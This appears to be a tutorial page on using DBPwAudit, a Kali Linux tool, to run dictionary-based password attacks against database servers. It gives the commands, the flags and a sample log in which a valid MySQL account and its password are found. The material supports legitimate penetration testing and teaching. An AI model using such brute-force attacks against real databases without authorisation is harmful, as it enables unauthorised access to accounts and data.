DataBase Auditing with Open Source Tool DBPwAudit

Learn | Teach Open Source Technologies

DataBase Auditing with Open Source Tool DBPwAudit

DBPwAudit is a Java-based tool designed to audit passwords for Oracle, MySQL, MS-SQL, and IBM DB2 servers. The application design is greatly simplified to allow us to add more database technologies, as required. It helps the pentester to discover valid user accounts on the database management system, if not hardened with a secure password policy. It currently supports the dictionary-based password attack mechanism.

To start DBPwAudit, navigate to Kali Linux | Vulnerability Analysis | Database Assessment | dbpwaudit or execute the following command in your shell:

# cd /usr/share/dbpwaudit/
# dbpwaudit

This will display all the options and usage instructions on your screen. In order to know which database drivers are supported by DBPwAudit, execute the following command:

# dbpwaudit -L

This will list all the available database drivers that are specific to a particular database management system. It is also important to note their aliases in order to refer to them for test execution. In order to perform this particular example usage of the tool, we will have to install the MySQL driver. Once the MySQL database driver is in place, we can start auditing the target database server for common user accounts. For this exercise, we have also created two files, users.txt and passwords.txt, with a list of common usernames and passwords:

# dbpwaudit -s 10.2.251.24 -d pokeronline -D MySQL -U \ users.txt -P passwords.txt
DBPwAudit v0.8 by Patrik Karlsson <[email protected]>
----------------------------------------------------
[Tue Sep 14 17:55:41 UTC 2013] Starting password audit ...
[Tue Sep 14 17:55:41 UTC 2013] Testing user: root, pass: admin123
[Tue Sep 14 17:55:41 UTC 2013] Testing user: pokertab, pass: admin123
ERROR: message: Access denied for user 'root'@'10.2.206.18' (using
password: YES), code: 1045
[Tue Sep 14 17:55:50 UTC 2013] Testing user: root, pass: RolVer123
ERROR: message: Access denied for user 'pokertab'@'10.2.206.18' (using password: YES), code: 1045
[Tue Sep 14 17:55:56 UTC 2013] Testing user: pokertab, pass: RolVer123 ...
[Tue Sep 14 17:56:51 UTC 2013] Finnishing password audit ...
Results for password scan against 10.2.251.24 using provider MySQL
------------------------------------------------------
user: pokertab pass: RolVer123
Tested 12 passwords in 69.823 seconds (0.17186314tries/sec)

Hence, we successfully discovered a valid user account. The use of the -d commandline switch represents the target database name, -D is used for a particular database alias relevant to target DBMS, -U is used for the usernames list, and -P is for the passwords list.